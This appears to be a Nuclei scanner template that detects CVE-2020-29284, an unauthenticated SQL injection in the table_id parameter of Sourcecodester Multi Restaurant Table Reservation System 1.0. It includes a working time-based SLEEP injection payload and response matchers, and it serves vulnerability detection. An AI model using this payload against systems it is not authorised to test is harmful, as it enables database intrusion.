id: CVE-2020-29284 info: name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection author: edoardottt severity: critical description: | Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. reference: - https://www.exploit-db.com/exploits/48984 - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip - https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29284 cwe-id: CWE-89 cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:*:*:*:*:*:*:*:* epss-score: 0.02921 metadata: max-request: 1 verified: true tags: cve2020,tablereservation,sqli,unauth,edb,cve http: - method: GET path: - "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-" matchers-condition: and matchers: - type: dsl dsl: - 'duration>=6' - type: word part: body words: - "Restaurent Tables" - "Chair List" condition: and - type: status status: - 200 # Enhanced by md on 2022/12/08